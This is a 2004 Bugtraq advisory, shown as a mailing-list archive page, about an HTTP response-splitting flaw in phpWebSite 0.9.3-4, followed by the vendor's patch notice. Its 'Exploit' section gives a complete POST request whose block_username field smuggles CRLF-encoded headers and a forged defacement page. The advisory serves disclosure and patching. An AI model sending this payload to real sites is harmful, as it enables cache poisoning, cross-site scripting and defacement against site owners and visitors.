[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    security hole (http response splitting) in phpwebsite
From:       "Maestro De-Seguridad" <maestrodeseguridad () lycos ! com>
Date:       2004-11-11 19:55:35
Message-ID: 20041111195535.4FBBC3384C () ws7-3 ! us4 ! outblaze ! com
[Download RAW message or body]

ADVISORY
 
Author: Maestro (me!)
 
Date: 11-NOV-04
 
Vendor: Appalachian State University (http://phpwebsite.appstate.edu/)
 
Product: phpWebSite 0.9.3-4

Product description (from vendor website):
phpWebSite provides a complete web site content management system. Web-based \
administration allows for easy maintenance of interactive, community-driven web \
sites. phpWebSite's growing number of modules allow for easy site customization \
without the need for unwanted or unused features. Client output from phpWebSite is \
valid XHTML 1.0 and meets the W3C's Web Accessibility Initiative requirements. \
phpWebSite is written in the PHP Programming Language, making it ideal for developers \
to write customized modules.

Problem: Http response splitting (web cache poisoning, xss, 
yadayadayada) - http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
  
Exploit:

POST /index.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-length: 218
Connection: Keep-Alive

module=user&norm_user_op=login&block_username=%0d%0aContent-Length:%200%0d%0a%0d%0aHTT \
P/1.1%20200%20Ok%0d%0aContent-Length:%2031%0d%0aContent-Type:%20text/html%0d%0a%0d%0a{html}This \
site in 0wned{/html}&password=foobar

(replace curly braces with lessthan and greaterthan)

Vendor status: The vendor fixed this problem (11-NOV-04). 
From vendor security mail list:
A security vulnerability was brought to our attention recently and we
have posted a patch to resolve this issue.  The patch can be
downloaded
from here:

http://phpwebsite.appstate.edu/downloads/security/phpwebsite-core-security-patch2.tar.gz
                
md5sum: fcefda44a8d691c844593d815479a1ce

This patch should only be applied to versions 0.9.3-2 or greater.  All
you need to do is untar the file in the base directory of your
phpwebsite install.




-- 
_______________________________________________
Find what you are looking for with the Lycos Yellow Pages
http://r.lycos.com/r/yp_emailfooter/http://yellowpages.lycos.com/default.asp?SRC=lycos10



[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic